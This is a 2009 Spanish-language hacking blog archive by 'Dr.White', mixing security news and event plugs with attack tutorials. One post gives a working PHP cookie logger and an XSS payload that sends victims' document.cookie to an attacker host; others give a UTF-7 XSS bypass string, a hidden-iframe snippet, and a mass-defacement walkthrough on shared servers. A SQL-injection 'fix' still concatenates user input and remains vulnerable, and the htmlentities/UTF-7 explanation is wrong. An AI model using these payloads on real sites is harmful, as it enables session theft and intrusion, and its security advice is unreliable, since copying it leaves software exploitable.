miércoles 30 de septiembre de 2009

Metaspl0it Unleashed - Manual




Tengo el Agrado de Decirles que los de Offensive-Security han sacado un manual de Metaspl0it muy completo, lo recomiendo mucho yo no tenia tanta experiencia con esta t00l pero he estado leyendo mucho sobre metaspl0it y espero poder hacer mas factibles mis ataques de intrusión.


les dejo el Link del Manual, lo pueden ver aquí, espero les agrade, está bien completo sinceramente, el manual ya tiene un tiempito en la red pero pense que ya lo había puesto en el blog...


Disfrutenlo y Saludos
Dr.White

martes 29 de septiembre de 2009

X.25 Ethical Hacking Conferences.




X.25 Ethical Hacking Conferences, Conferencias en Mexico dictadas por los mejores Hackers éticos de todo méxico, las mejores capacitaciones, el mejor contenido, si querías conocimiento lo obtendrás en las conferencias X.25;

Puedes Destacarte haciendo muy buenas preguntas o inclusive resolviendo los retos de su wargame, y mucho mas, se darán diplomas y toda clase de premios, son conferencias que no te puedes perder.

Son respaldadas por otras asociasiones y lugares de estudio asi como webs reconocidas y por supuesto con el apoyo del CCAT [Centro de Capacitaciones de Alta Tecnología].

Mas Información

====
Lo recomiendo
====


Saludos
Dr.White

Cuidado con el Hijacking

El Hijacking es un término que se usa para decir que han secuestrado sierta parte o toda de lo que nosotros navegamos en internet... es decir por ejemplo si nos hijackean navegador Brwoser Hijacking, un Deface, Page Hijacking, pero en fin pues esto se puede definir con otros términos, yo ahora les voy a decir que hay de diferente entre un hijack y un ataque normal...

Session Hijacking [Peligro Mayor]

A quien no le ha entrado un troyanito alguna ves... a todos... o un spyware... bueno... a lo que voy es lo siguiente, el hijacking a tus Sessiones pues es una manera de ataque poco peculiar pero que le pasa a muchas personas sin embargo no se dan cuenta, es el robo de tus cookies o Sessions que tienes en una pc por medio de un ataque local o remoto...

Que diferencia hay con "un robo de cookies" pues cuando te eres victima de un ataque de hijacking el atacante no necesariamente te cambia la pass o algo asi sino mas bien te espía, ve lo que haces, te analisa, gente muy inteligente.


Modem Hijacking [Peligro Mayor]

Esto es muy parecido a un ataque MITM pero el atacante en este caso no se conforma con sniffear conversaciones o robar unos cuantos datos que pasen por ahí sino que el infecta de tal manera tu modem que te deja vulnerable por todos lados es decir vulnerable a que otros te puedan atacar de manera remota, puede ser por el 445 como lo hacen varios malwares o por un simple cliente-servidor que se te fue instalado previamente con o sin tu consentimiento.


Ip Hijacking [Peligro Mayor]

Este digamos que es de los mas comunes se le conoce como ip hijacking pero es lo básico, el hacer conexiones telnet sin el concentimiento de la persona a la que atacamos y bueno tienes el poder de ejecutar comandos del DOS y pues los que ya tienen experiencia saben que se puede hacer jajaja.


El Hijackign es básicamente los mismo ataques que conocemos pero digamos que son como ladrones de información, muchas veces los datos obtenidos son para chantaje y otras cosas...


Espero tengan cuidado con los Atacantes, tambien les recomiendo que pues esten siempre al tanto de lo que pasa con su pc es decir un Firewall, quizas el estar en continuo vigilamiento de su sistema o algo para que sea usted mas seguro.


Saludos
Dr.White

lunes 28 de septiembre de 2009

Filosofando para una persona que escoje sistemas

no puedo decir que tengo años de experiencia como otros que pues tienen titulos universitarioso o de empresas que pues a veces ni quiero ver precios, sin embargo creo haber aprendido mucho en el poco tiempo que llevo en esto...

tengo como un año leyendo y aplicando prácticas sobre programación y pues no se me ha dado tan mal, hasta ahora pues si la he cagado como se dice pero siempre lo he dicho y diré hechando a perder se aprende... hoy he estado trabajando en dejar un servidor inmune a Denial Of service, Distributed Denial of service y Distributed Reflection Denial of service; es una tarea imposible verdad? pero lo estoy intentando y pues no se me da tan mal...

hoy pues dirán mientras leen esto, que quiere decir este pobre escritor, pues hoy escribo con el corazón por las que he vivido, escribo para compartir lo vivido, han sido horas de horas sin dormir, tratando de escribir programas en perl que verifiquen la estabilidad del servidor, configurando las Iptables y mas, ustedes saben a que me refiero...

Ahora ya que veo que esto se pone aburrido quiero acabar con esta humilde historia y predicandole a la gente que se está iniciando en Seguridad, no lo dejen es bien extenso y bien interesante, realmente es lo mas bonito seguridad y programación son muy buenos... tambien pues para los que ya estan en seguridad.

No se arrepientan nunca la seguridad es lo mejor lo que si les recomiendo nunca se actualizen, lean blogs segu-info es buena recopilación, el blog de jbyte recopila pero es un poco mas estrategico en lo que se habla...


Espero que este texto les haga recuperar el gusto a la seguridad a aquellos que lo estaban perdiendo y aquellos que no la tenian pues que la agarren que una ves que vulneras tu primera web, que vulneras el primer server, es muy emocionante...


Saludos y Gracias
Dr.White

===========
Entrada dedicada a:
Jorge A. y Valeria O.
===========

domingo 27 de septiembre de 2009

Aprende a buscar un poco mas con google

ya muchos conocen del Tema que les voy a hablar, si, son los Google Dorks por ahora les voy a hablar lo básico y quiero que sepan de que los google dorks no son de ejecutar por ejecutar mas bien es un tema que tienes que pensar muy bien es decir muchas imaginación para poder combinarlos de forma correcta...

primero...

Cache

Este Google Dork lo que hace es mostrarte el cache de una pagina es decir lo ejecutas de tal modo que google te da como resultado cache...

Modo de Uso:

Cache:www.web.com

===================
Link

ahora uno mas útil mas que nada lo puedes usar para ver como estas de links en tu web es decir en que páginas apareces... es decir un link hacia el dominio que tu pongas.

Modo de Uso:

link:www.web.com

====================
Site

Con este de aquí lo que puedes hacer es fácil, pones el comando y la pagina mas la busqueda y lo que tu hayas puesto como palabra lo buscará en la web que tu escribiste.

Modo de Uso:

pen-test site:seguridadblanca.blogspot.com

====================

Allinurl

Este creo yo es uno de los mas famosos, inclusive para los que no saben mucho, este es un dork muy utilizado para buscar palabras que quieras en una url, un ejemplo, si encuentras un error en las paginas de un script que sean tupalabra?id= entonces pues tu buscarías tupalabras y id, lógicamente orientado a pentesting, pero ustedes lo pueden usar como crean y quieran.

Modo de Uso:

allinurl: noticias id

====================

FileType

Este mas que nada se puede usar para webs con errores tontos como poner passwords en archivos .txt o para buscar errores e identificar los archivos de una extención que querramos o en su defecto podemos usarlo para encontrar algunos libros con la combinación de otros dorks.

Modo de Uso:

allinurl: libro filetype:pdf

===================


En el ultimo ejemplo sustituyen libro por lo que sea para buscar archivos .pdf

Si tienen imaginación creo que con esto podrían llegar a encontrar mucho con google

ya ustedes elijan hacia donde lo orientan.


Saludos
Dr.White

sábado 26 de septiembre de 2009

Seguridad En Bancos... un mito?

En esta ocación les vengo a hablar de un tema que pues parece que es un mito, los mejores bancos del mundo cuentan con los mejores tipos de seguridad, manejan sus bases de datos con la mejor seguridad, usan de los mejores sistemas en autentificación pero parece que ignoraran lo que realmente pasa...

la mayoría de veces el cliente es el que está sufriendo el ataque ya sea por un keylogger o un troyano, quizas un spyware pero, digamos que no serviría de nada tanta seguridad, por ahí escuche que un metodo de seguridad sería ponerle un token (cookie) o algo en si esto no ayuda, un pequeño trabajo de Cookie Poisoning y pues está listo... sin embargo pues realizando un analisis gráfico y leyendo mucho sobre seguridad di con que es mas fácil mejorar la Seguridad en la Transaccion, un ejemplo sería que todas las transacciones sean confirmada por telefono o inclusive si quiera ponerlo un tipo de activación...


Aun que muchos expertos de seguridad dicen que el banco está "seguro" pues no. esta seguro el banco pero no el usuario, en mi opinion la seguridad de un banco solo vela por la seguridad de los datos a ni vel de servidor del usuario pero que hace cuando un usuario tiene un keylogger...


La verdad pues de la misma boca de un excelente en seguridad salio la siguiente frase(no revelaré de quien):

"Al parecer la unica manera de mantener segura la información es no teniendola"

palabras muy sabias viendolas desde mi ángulo, siempre quieren encriptar la información y por supuesto que ayuda pero sinceramente no hay ni punto de comparación de que simplemente habría que impedir que el cracker ingrese...


este texto es mas que nada una reflexión para darnos cuenta que no sirve de nada encritpar la información con super algoritmos, lo que importa es asegurarnos que no entre el cracker, no existen sistemas seguros al 100% pero hay que procurar que el nuestro siempre sea 99.99% seguro, y no solo preocuparnos por nosotros y nuestros servidores sino tambien de los usuarios


Saludos
Dr.White

lunes 21 de septiembre de 2009

Pwtent Pwnables 100

Este reto fue dado en Defcon y pues buscando los retos en internet para ver que tan dificil era defcon di con este y me intereso mucho, para que decir que no, es un reto dificil pero no imposible de superar, aquí les traigo la resolución al Reto hecha por trancek, mientras veia la resolución del reto pues me di cuenta que estoy virgen en la Ingenieria Inversa y hoy me pondré a estudiar mas para aprender...

El reto es de Ingenieria Inversa, osea Catalogado como Exploiting Según Defcon...


Espero les Guste la explicación ya que es muy completa y fácil de interpretar para aquellos que tienen conocimientos previos...


Descarguen Aquí

Agradecimientos a: trancek por facilitarnos las respuestas...


Saludos
Dr.White

sábado 19 de septiembre de 2009

Nagios - Atento a Tu red

Tuve la oportunidad de probar ayer esta tool que sirve para administrar Redes, la Vi como una herramienta de pen-test en un blog pero a mi mas me parece de monitoreo se puede usar como pen-test correcto pero creo que es mejor usarla como administración:

Web de la Tool Aquí

Para ver Imagenes de la Tool:

Click Aquí

Les recomiendo ir a Este Link para que aprendan mas de nagios...

Documentos para que aprendan a usarlos Aquí

Esperemos les Guste la tool, no es tan dificil de Usar, pero toca investigarla, yo aun sigo leyendo de esta tool para familiarizarme un poco mas...

viernes 18 de septiembre de 2009

Reto 1 SeguridadBlanca para Principiantes

Aquí he hecho un reto para principiantes, espero lo puedan pasar... fue diseñado exclusivamente para ustedes...


Ir al Reto


Saludos
Dr.White

Robando Cookies con un Xss

Esto es muy viejo sin embargo me gusta ponerlo para queno se pierda el sentido de que hay contenido arcaico pero útil en el blog...

Primero debemos de conseguir una web vulnerable a Xss de preferencia usen una que no moleste tanto algo asi como una que sea 100% vulnerable que pueda mostrar cookies y mas, tambien vamos a necesitar un Servidor Web que permita PHP ;)


Ahora si miren les diré el funcionamiento nosotros vamos a crear un archivo donde se guarden las cookies, lo llamaremos almacen.txt ;) mm ahora necesitamos hacer que los datos se guarden ahi y como hacemos eso? pues hay que crear un script en PHP que haga la función...


Ahora nuestro code será:


<?php
$ip = $_Server['REMOTE_ADDR'];
$co = $_GET[c];
$datos = "ip: " . $ip . "cookie: " . $co . "<br>" . "lo hice con el tuto de SeguridadBlanca";
$archivo = fopen('/almacen.txt', 'a');
fwrite($archivo,$datos);
fclose($archivo);
header("Location: http://webtuya.com");
?>




lo pondremos en el mismo directorio que el almacen.txt y lo guardaremos como rob.php

Bueno con ese code se roban las cookies y se obtiene la ip de la víctima... ustedes pueden personalizar el documento para que cojan mas cosas de la víctima, ahora ustedes lo que tienen que hacer es generar un xss con window.location...


window . location='http://miweb.com/rob.php?c='+document.cookie;

Ahora si ya estamos completos o casi solo falta completar... con un ejemplo


http://www.webvulnerableatodo.com/buscador.php?palabra=<script>window.location='http://miweb.com/rob.php?c='+document.cookie;</script>


en algunos casos podemos variar y poner document.location en ves de window.location...


Espero les haya gustado el tuto, dudas o cualquier cosa pues comenten...



Saludos
Dr.White

jueves 17 de septiembre de 2009

Los Xss Cuidado!


Durante un buen tiempo yo vine dando como respuesta a los Xss el Htmlentities como función pero he dado con que no , no es tan simple como eso... de hecho sigue siendo vulnerable a Xss solo tienes que aplicar un pequeño bypass que les enseñaré hoy...

un codigo que supuestamente deberia de evitar el XSS sería:


<?php

$test = htmlentities($_POST['valor']);

echo '$test'
?>


y bueno con un formulario hecho...


Ahora ustedes dirán que tiene ese codigo de mal pues... el filtro htmlentities

Como ustedes saben o no el filtro de los htmlentities lo que hace es pasarlo a utf-7 entonces no se interpreta y ya pues no se ejecuta...

la funcion que usa es algo asi en PHP:


<?php

echo mb_convert_encoding('tu code xss', 'UTF-7');

?>


entonces ahi les devolvería un valor como:

UTF-7 pero que pasa si en el valor del Xss lo ponemos ya en UTF-7 es decir en ves de poner nuestro conocido:


<script>alert(/hacked/);</script>


con // en ves de '' para evitarnos problemas de transformación...

entonces ya transformado sería:


+ADw-script+AD4-alert(/hacked/)+ADsAPA-/script+AD4-


eso causaría un Bypass que igual ejecutaría el Xss...


Como ven... todos cometemos este error.. o la mayoría... es decir prácticamente todos los webmasters que ponian htmlentities estan un poco fregados asi que les recomiendo cambien y lo digo incluyendome yo lo usaba hasta que decidí hacer un experimento con los http headers y netcat hasta que di con este problemin investigue un poco mas en google y como ven pues es bien crítico esto... para los que ya tenían conocimiento de eso pues fomentemelo para que no se siga cometiendo este error... espero que no lo mal gasten el conocimiento...


Ahora como corrigen el error? pues muy fácil...


<?php

$test = htmlspecialchars($_GET['test'], ENT_QUOTES);

?>


en ves de eso usen htmlspecialchars() como función para que funcione bien... mmm tambien pueden usar sus str_replace() pero ya vean ustedes...

espero que este tuto les haya gustado, me he esforzado mucho en hacerlo...

Pd: sorry por la imagen pero es que =s no tengo alguien que me haga y edite las imagenes para que salga con la url jaja...


Saludos
Dr.White

miércoles 16 de septiembre de 2009

Pasando 3 retos y medio de los retos principiantes

Aquí les comparto un video hecho por mi en el cual muestro como pasar los retos de la pagina http://isatcis.com un humilde video por una humilde persona, espero les guste ;)




Saludos
Dr.White

martes 15 de septiembre de 2009

Peruanos - nos vemos en el evento de TECSUP?

Como algunos sabrán pues TECSUP ha invitado a Bruce Schneir para que de varias charlas sobre seguridad en redes y telecomunicaciones, este evento se realizará en Lima, Perú del 23 al 26 de el mes en curso.


Mas Info:

http://www.tecsup.edu.pe/webuds/web/noticia

=============================

yo digo: Muchachos yo aun noe estoy seguro de que vaya... yo si voy el primer dia iré con un Polo, Camiseta, remera o como lo conoscan que dice Dr.White si alguno de ustedes me visualiza en el evento no dude en Saludarme para compartir conocimiento, aun no se si voy pero si voy espero verlos por ahí.


Un Saludo
Dr.White

Encripta tu PHP

Pues alguien hace un tiempo pedi uno y tuve eso en mente y finalmente hoy se los doy, Este es un Cripter de PHP, es decir tu pones tu script en php y lo encripta de tal manera que no tenga problemas en la ejecución y que nadie lo pueda ver simplemente si es que tuviesen acceso a tu host... Espero que esta utilidad les sirva WebMasters...



Saludos
Dr.White

lunes 14 de septiembre de 2009

Para el Hardening V1 by Me

Es la primera ves que haré una entrada así y espero les guste, enseñaré como proteger una web de Sql Injection muy popular la tipica que empiesa con -1+union...


Ahora nuestro codigo vulnerable será...



if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
}



Ahora como ven el Anteior code es vulnerable por dos lados por el Where y por el Select entonces por Ahora vamos a asegurad solo el Select ya que esta es solo la Versión 1 de los Artículos que haré de Hardening a Web APPs y CMS...

Para empesar tenemos que saber que hacemos con la consulta ahi lo que está diciendo como quien dice en Pseudocodigo es:

Seleccionar lo que venga de pages donde el id sea el que hemos ingresado o se nos ha asignado.

Entonces como que ahi nosotros decimos pero que pasa si es que lo que venga se equivoca la primera ves y la segunda tambien y la tercera tambien hasta que en la cuarta ya es entonces tenemos tres espacios de error por los cuales podriamos por comandos ir extrayendo datos que no son nuestros en este caso el robo de datos.

entonces lo que harémos será no ser vagos y hacer que se ponga campo por cam y registro por registro lo que pedimos nuestra sentencia sería asi:


if (isset($_GET['id'])) {
$result = mysql_query("SELECT id FROM pages WHERE id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
}




siendo la tabla:


CREATE TABLE `pages` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(45) NOT NULL,
`content` text NOT NULL,
`hp` tinyint(1) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;


por ahora espero que esto les ayude a que ya no cometan ese error en la proxima edición del tutorial les enseñaré al arreglar el error del Where que muchos cometen.


Espero les haya Gustado.


Saludos
Dr.White

Iframe Invisible 2 Pen-Test

En el Blog Hacking-Avanzado Di con que hay un tutorial de hacer DDOS con un Iframe o mejor dicho varios Iframe pero me parece que cometió un error al decir que poniendo 0 de height y 0 de width sería invisible para el ojo humano asi que decidí enseñarles un code de como hacer un iframe que sea realmente invisible.

Primero que todo un iframe como ustedes saben pues muestra como un pop-up un fragmento de pagina dentro de un recuadro, pues ahora si nosotros le pusieramos de width y height 0 entonces mostraria un cuadrito pequeño como este:




sin embarco combinando bien las propiedades podemos hacer que el fondo y el iframe en si tenga el color de fondo de la web y si nosotros le ponemos en el body a nuestra web transparente pues si configuramos nuestro code del iframe se hará invisible...

Code del Iframe para que tome color de fondo:


<iframe src="LA URL DE TU IFRAME" marginheight="0" marginwidth="0" noresize scrolling="No" frameborder="0" style="width: 0px; height: 0px" name="I3" id="I3"></iframe>


en caso de que quieran ver la propiedad o como quedaría el code entero:


<html>

<head><title>seguridadblanca</title></head>

<body style="background-color: transparent;">

Texto de la página

<iframe src="LA URL DE TU IFRAME" marginheight="0" marginwidth="0" noresize scrolling="No" frameborder="0" style="width: 0px; height: 0px" name="I3" id="I3"></iframe></body>

</html>





ustedes pueden cambiar el name, la url, el id y lo quue creas necesario del iframe según tu necesidad...


Espero les sirva y si quieren ver el tuto de DDOS por Iframe den Click Aquí


Saludos
Dr.White

domingo 13 de septiembre de 2009

Conferencia - Source!




La Conferencia Source de seguridad Que se daba en Boston, Estados Unidos, Este año se llevará acabo en Barcelona, España, Me queda un poco lejos ir para pasarla con algunos de los lectores españoles pero aun así deseo de corazón que se diviertan y aprendan los que asistan.

Para ir a la Web den click Aquí


Los precios y demas cosas las ven ahí dense prisa para que se puedan inscribir, es un poco caro pero se puede acceder...


Saludos
Dr.White

sábado 12 de septiembre de 2009

Retos Principiantes...

Lectores, Aquí les traigo unos retos muy entretenidos...

http://isatcis.com/

Veamos si los pueden pasar... hay un problema no se puede pasar el reto 8 en ves de 16 hay 8... lo siento es que se ha cambiado el nombre del archivo o algo... si descubro cual es el nombre pues les aviso, ya pase los 8 primeros y está muy divertido de veras...


Saludos
Dr.White

Pen-test: Mass Defacement

Antes de empesar quiero decirles que solo voy a hablar del tema lo explicaré solo a medias para evitar que este contenido sea mal usado en fin solo es como fines educativos...

Tenemos que escannear la web ver si tiene bugs y todo pero damos con que no tiene ni un bug, ni uno explotable... entonces ahora que hacemos anteriormente enseñe en un articulo de Reverse DNS como se buscaban webs en el mismo servidor para explotar, ahora viene la parte nueva buscamos hasta encontrar una web vulnerable, digamos que ya encontramos una web vulnerable a sql injection, inyectan y van al panel, entran y suben la shell, creo que hasta ahi ya tienen el acceso ganado a la web del servidor vulnerable a mass defacement, resulta que en la shell damos con que el Safemode está Activado, pues lo bypasseamos de una manera simple con un php.ini con mal configuración que nosotros con un pequeño script haremos la malconfiguración del mismo.


Ahora ya toca la parte del Mass Defacement, Resulta que ya no hay safemode podemos buscar con comandos por que al estar mal configurado vamos a poder ir a cualquier directorio del Servidor, ahora ya está regalado, podemos encontrar todas las rutas del servidor y pues si ustedes quieren pueden ir a http://web-app.com/ estando con la shell en http://web.com entonces ya el resto es cuento.

Bueno los ayudo, una forma de ver que webs existen es ver los logs de apache... Ahora la parte del Deface... jaja la parte mas emocionante como dirian pues aquí ya toca su imaginación, por ejemplo toca modificarle lo que le quieran modificar por que ya estan libres de saltar por todos los directorios que esten en el servidor...

Si quieren la password o algo para hacer un deface mas ético pues recomiendo ver los archivos de configuración para verlas aunque sea en MD5 y Desencriptarlas....

============================================

El Script del Safemode no lo pongo ya ustedes lo pueden imaginar usen un socket y usen un fwrite para reescribir siertas cosillas...

Sobre las rutas de los logs de apache pues ustedes vean ahi los directorios en /apache/logs y podrán encontrarse con mucha información de los dominios y host por los cuales podran navegar como quieran ya que ustedes con comandos es como si estuviesen como Administradores del VPS...

===========================================


Un Saludo y Espero les haya Servido.
Dr.White

viernes 11 de septiembre de 2009

Rogue Malware


Hablaremos un poco de esto...


El Rogue Malware... este tipo de malware lo que hace es tratar de convencerte de que hay un virus en el sistema para que pagues y simulan que lo remueven de tu sistema.


¿Como funciona?

- El Malware lo que hace es simular una advertencia de microsoft diciendote que tienes un software malicioso con un link en el cual hay una descarga de pago que dice que remueven ese Virus.

¿La infección?

- Pues se puede infectar uno descargando archivos de webs no recomendadas, la instalación no es notoria, tambien suele suceder que dan versión de prueba de Anti-malwares que el usuario descarga y termina infectandose con uno de estos...

¿si estoy infectado?

- si tienes un buen antivirus y/o Anti-malware, o algun tipo de programa protector que tenga firmas actualizadas pues lo detectará y automaticamente lo eliminará, si el malware ha sido muy bien programado habrá que desinfectar archivo por archivo lo cual resulta un poco dificil ya que tendriamos que hacer seguimiento a los archivos que usa el proceso.

¿Softwares malignos?

- MalwareCore, Antivirus 2009, WinSpywareProtect, WinDefender, etc

¿Recomendación?

- Pues si quieren saber de programas para la eliminación de ciertos virus consulten con gente que sabe ya que pueden correr el riesgo de descargar uno de estos.


Saludos
Dr.White

Ecuentro Internacional de Seguridad Informatica

Colombianos y Latino Americanos... pues les quería recordar del EISI que se llevará a cabo los días 7, 8 y 9 de octubre... bueno para aquellos que no estan enterados pues aquí tienen la info... será en colombia en la ciudad de manizales...

su página oficial es esta

Espero que vayan ya que estará muy buena, yo no los podré acompañar pero espeo vayan para que compartan lo vivido aun que sea en un mail jaja...

Miren el grupo de Dragonjar Aquí


==================
Entrada dedicada a
Segio Buenaventura
Lector del Blog
==================


Saludos
Dr.White

jueves 10 de septiembre de 2009

Mini-Tuto Listbox en Visual Basic.NET by Me

Bueno muchachos un Control que es muy fácil de usar y que ahora les voy a explicar como funciona... obviamente solo algunas cosillas...

Primero vamos a conseguir un Listbox de la barra de herramientas... dejemoslo con el Nombre

"ListBox1" sin las comillas...


Ahora creamos un boton y un textbox tambien...


Lo primero como agregar items al Listbox1 pues fácil, vamos a usar el siguiente code para agregar 6 items...

ListBox1.Items.Add("hola0")
ListBox1.Items.Add("hola1")
ListBox1.Items.Add("hola2")
ListBox1.Items.Add("hola3")
ListBox1.Items.Add("hola4")
ListBox1.Items.Add("hola5")

Bueno asi se agregan los items poniendo nombre de tu listbox + items + entre parentesis tu item...


Ahora para ustedes muchachos... poniendo en un textbox el indice de un item es decir si el item es el primero se crea como un Arreglo y muestra el 0 con el siguiente code que pondremos en nuestro boton...

TextBox1.Text = ListBox1.SelectedIndex

ahora miren que le auto asignará un indice a su Item como si fuese un arreglo...


verán que cuando seleccionan un item aparece un indice ojo no tieen nada que ver con el numero que hay despues del Hola...


Otra cosa básica... como saber cuantos items hay en un Listbox...


TextBox1.Text = ListBox1.Items.Count


Fácil no?


ahora mm dejenme ver... a sisi quizas como podemos borrar un item por su indice...

ListBox1.Items.RemoveAt(CInt(TextBox1.Text))

poniendo ese code el numero que ustedes pongan lo borrará siempre y cuando exista pero eso ustedes lo pueden arreglar con una pequeña condición IF...


Bueno eso es lo mas básico de los Listbox, practiquen para que los puedan usar de manera mas facil pronto les enseñaré a usar tambien los combobox... los sockets y mas...

Saludos
Dr.White

Tuto PHP formularios desde 0 con method GET

como es incómodo poner Lenguaje de programacion sobre blogger pues aquí les dejo el link...


http://xtremfiles.com/index.php?topic=811.0


Tarde demaciado en hacerlo... como 30 min pero está bien explicado si quieren aprender seguridad web ahi pongo tutos básicos y buenos... recomiendo ese foro si estan aprendiendo php ya que ahi enseño yo el PHP soy mod ahi...



Saludos
Dr.White

Un Video de Analisis de Malware lo he visto y está muy bueno

Este es un Excelente Video de Analisis de Malware realmente es básico pero sirve mucho, enseña algunas cosillas simples pero que sirven a diario en el analisis de malware, mucha redundancia jaja aquí les va.

http://www.securitytube.net/Simple-Malware-Analyzing-video.aspx


Ahora no he podido poner aquí el video por siertas cosas del javascript pero veanlo de esa web creanme que no se arrepentiran... un pokito largo el video pero vale la pena =)


Saludos
Dr.White

miércoles 9 de septiembre de 2009

ClickJacking

Una presentación por DragoN el administrador de DragonJAR

Esta simpatica la recomiendo para que se orienten....





Link a la Presentación:

Click Aquí


Recopilado de DragonJAR



Saludos
Dr.White

Torneo de Seguridad Informatica - Yashira

Yashira es un foro de Seguridad y Hacking que ahora es reconocido por sus grandes retos, lo recomiendo, no estoy resolviendolos pero en algun momento me pondré a hacerlos...

Espero que entren, no tengo ningun trato con yashira yo lo hago por que me parece un buen reto.


Entren al reto entrando al siguiente Link

Espero que si quiera se puedan registrar ;)


entren al foro desde aquí



Saludos y espero que usen el nombre del foro es decir Seguridad Blanca para cuando esten pasando los retos...



Saludos
Dr.White

martes 8 de septiembre de 2009

Seguridad En Sus Sistemas Unos tips by Dr.White

Esto solo es algo asi como un recordatorio de todo lo que deben de hacer para no tener problemas de seguridad en sus webs (nunca estan seguros):

  • Siempre Tener las Versiones mas Acualizadas.
  • Si tienes una duda Revisala.
  • Consulta webs de bugs para asegurar que tu aplicación no tenga bugs.
  • Pedir ayuda a un asesor o si eres un asesor verifica que los puertos de tu servidor esten configurados.
  • No aceptar archivos de Extraños.
  • Usar CMS de Codigo Libre y que sean configurables.
  • Estar atento a tu web.
  • Revisar los Contenidos del host constantemente.
  • Antes de subir el CMS o Script pruevalo en localhost ya sea con xampp o lamp.
  • Verifica que tus php.ini y .htaccess esten bien configurados
  • revisar que tu PC no tenga fallos de seguridad.
  • Por último pero casi como síntesis, asegurarse de que el PHP o Lenguaje web esté bien programado.
  • Un buen Antivirus.
  • Un Buen Anti-Spyware.
  • Un buen Firewall

Estos son tansolo unos consejos hay mas cosas que hay que tomar en cuenta pero con estas estás básicamente poco vulnerable ya que como dicen... "nadie está seguro en la red"...




Saludos
Dr.White

Apoyen a la Comunidad.

Hace ya tiempo que está abierto el foro pero la verdad no me había ocupado del mismo pues... espero que ustedes me apoyen llamando gente al foro =)


http://seguridadblanca.org/foro/index.php

Ese es el link del foro espero que se registren y nos ayuden a llenarlo, obvio no de spam pero necesito de su ayuda =)...


Mil Gracias...


Algo mas:

Ese foro es el Foro de la Comunidad Seguridad Blanca nada de solo Dr.White el blog lo manejo pero hay cargos para todos en el foro solo esfuerzense y conseguirán gracias de nuevo.


IR AL FORO


Saludos
Dr.White

AirCrack NG V1.0




El AirCrack es una Utilidad que creo que todos hemos utilizado en algun momento, con esta tool se pueden crackear contraseñas de redes wi-fi, esta versión es muy parecida y casi igual de buena que la 1.0Rc4 que fue vendida hace un tiempo, las actualizaciones son no tan notables pero hacen mas comodo su uso en el ejemplo de la actualización para windows han hecho un GUI para un manejo mas fácil de parte del usuario...

Caracteristicas obtenidas de DragonJAR:

* Airserv-ng: Ahora funciona correctamente para 32 y 64 bits.

* Wesside-ng: Se han solucionado algunos errores

* Airodump-ng-oui-update: Se asegura que el usuario root cuando se actualiza el archivo.

* Airmon-ng: Actualizado enlace de descarga IW (0.9.17).

* Todos: compilación fija con gcc.

* Parches: nuevos parches patches.aircrack-ng.org: mac80211_2.6.28-rc4-wl_frag + ack_v3.patch

* Página de manual: Actualización aireplay-ng página de manual.

* Instalación: Eliminado (por ahora) un requisito inútil para la instalación de OSX.

* Interfaz gráfica de usuario (Windows): Fijo 2 ª selección de un archivo de captura.


Los que usan otras versiones les recomiendo actualicen para que tengan un mejor funcionamiento...


Si quieren descargar o mas información Vayan a la página de AirCrack NG.


Ir a la página



Saludos
Dr.White

Actualizate al Windows 7

Algunos saben otros no pero si tienen una compu ya sea pc o laptop recien comprada con windows vista ustedes pueden actualizarse a Windows 7, en mi opinion los dos son malisimos a pesar de que una de mis pcs tengo windows vista no lo recomiendo, para actualizarse a Windows 7 si es lo que quieren pues contacten con su proveedor microsoft, visiten la web de microsoft o en su defecto visiten Este Link para mas información, insisto jaja les recomiendo en todo caso el XP si son amantes de windows en su defecto les recomiendo si estan en su casa con su Familia Debian o Ubuntu y si se dedican al negocio del pen-test y todo tipo de tests de intrusión pues usen Nubuntu
Quizas un Backtrack a lo mejor un OWASP o quien sabe jaja espero elijan una distro linux ya que en este blog se predica el software libre...


Saludos
Dr.White

lunes 7 de septiembre de 2009

Conferencia de Ethical Hacking


















Conferencia de Ethical Hacking en Mexico la Recomiendo al 100% ; Los profesores son realmente calificados para esta charla...


Mas Info:

informes[at]ccat[dot]edu[dot]mx


Saludos
Dr.White

(IN)Secure Magazine 22


El 1 de septiembre con un poco de retraso ha salidos la Revista 22 de (In)Secure. espero que les guste yo ya comenze a ver de que se trata...

La Revista

La Pagina:

Net-Security


Esperen la siguiente versión...


Saludos
Dr.White

Portatiles Nokia

Nokia Booklet 3G es una computadora portátil que va a liberar nokia, un video ya ha sido liberado http://www.youtube.com/watch?v=fIHWM4liM2g, en septiembre se dice que se dirá una fecha de liberación para esta laptop, aun no se ha dicho nada ni las caracteristicas en concreto pero les puedo decir que la esperen con ansias, he oido de fuentes muy confiables que su bateria durará mas de 12h, será muy rápida en si y en internet; aun no se aclara con que sistema operativo será liberada pero esperemos apoyen el Codigo Libre, incluirá puertos para tarjetas sim...


Saludos
Dr.White

Cámara Open Source


Nunca se sabe hasta donde puede llegar el Software Libre, desde simples programas, piezas de hardware hasta una camara digital como las que usamos a diario.Esto sera una ventaja para todas las personas que podran modificar las cámaras según a sus necesidades y podran convertirlas en verdaderas herramientas de ultima generación gracias a los codigos y aportes que hagan las personas en la pagina web oficial de este lindo aparatito.
Esta de más decirla que esto pondra al mundo patas para arriba, esque ninguna de las cámaras digitales deja modificar el software que hace que ese montón de circuitos funcione, y Marc Levoy y Andrew Adams de la Universidad de Stanford no pensaron en otra idea que esta tan descabellada, de hacer una camara digital de codigo abierto, grandioso verdad? , tan grandioso que hasta Nokia, Adobe Systems, Kodak y Hewlett-Packard ya están involucrados en el proyecto.

Fuente: todoxelvicio


Saludos
Dr.White

domingo 6 de septiembre de 2009

Cracking Tool: THC-Hydra 5.4

ayer puse una tool llamada brutus que tiene el mismo funcionamiento que hydra sirve para lo mismo pero este yo lo veo mas efectivo, para windows es a través de comandos, tambien hay para linux con interfaz gráfica y comandos. Esta tool es Open-Source por lo que me agrada aun mas y les repito es parecida a brutus pero mejor es decir crackea por diccionario:

  • FTP
  • HTTP
  • TELNET
  • My-Sql
  • Ms-Sql
  • HTTPS
  • Cisco
  • POP3

Y muchas mas, como se dan cuenta es un poco mejor... (mucho mejor en mi consideración).

Descarga el source aquí
Descarga para windows aquí
Descarga para windows GUI & Linea de comandos v5.0 aquí
Descarga para Palm O.S v4.6 Aquí


Imagenes:








Mas info: Pagina Oficial


Saludos
Dr.White

